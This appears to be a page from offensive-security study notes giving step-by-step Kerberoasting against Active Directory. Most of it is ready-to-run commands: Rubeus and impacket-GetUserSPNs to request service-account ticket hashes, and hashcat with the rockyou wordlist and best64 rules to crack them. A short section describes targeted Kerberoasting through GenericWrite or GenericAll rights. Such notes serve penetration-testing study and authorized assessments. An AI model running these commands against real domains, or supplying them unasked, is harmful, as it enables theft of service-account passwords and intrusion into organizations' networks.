Kerberoasting

Type 1: Using Windows and Kali Linux

# In this get the ticket of service account and then try to get the clear text password.
# we will need Rubeus.exe File. This we can download from the above git repo and then send it to Windows using SMB or iwr.

# Command to perform kerberoasting using rubeus(Windows):
.\Rubeus.exe kerberoast /outfile:hashes.kerberoast
# After it has finished Hash will be stored in hashes.kerberoast file. This possible if any kerberosatable user is found: "Total kerberoastable users : 1"

# We can then find the hash type of the hash and then crack it using hashcat.
# To use hash cat you need to transfer the file to Kali Linux using SMB.
# Example to crack the password:
sudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

Type 2: using only kali linux

#  In this get the ticket of service account and then try to get the clear text password.
# If you have multiple user check for them also
# We will use impacket-GetUserSPNs module for Kerberoasting.
sudo impacket-GetUserSPNs -request -dc-ip $ip_of_dc <Domain_Name>/<Username>:'<password>' -outputfile hashes.kerberoast
# Example: sudo impacket-GetUserSPNs -request -dc-ip 192.168.50.70 corp.com/pete
# "-request" : to obtain the TGS and output them in a compatible format for Hashcat

# Now we can use hashcat with proper hash type to decrypt the hash found.
sudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

Point to note:

if the SPN runs in the context of a computer account, a managed service account, or a group-managed service account, the password will be randomly generated, complex, and 120 characters long, making cracking infeasible. The same is true for the krbtgt user account which acts as service account for the KDC.

if we have GenericWrite or GenericAll permissions on another AD user account.

We can reset the user password.

Click here to check if user has GenericAll or GenericWrite permission.

https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces#genericall-on-user

Then we will set SPN for the user, Kerberoast the account and crack the password hash.

This type of attack is known as targeted Kerberoasting

PreviousAS-REP Roasting NextSilver Tickets

Last updated 1 year ago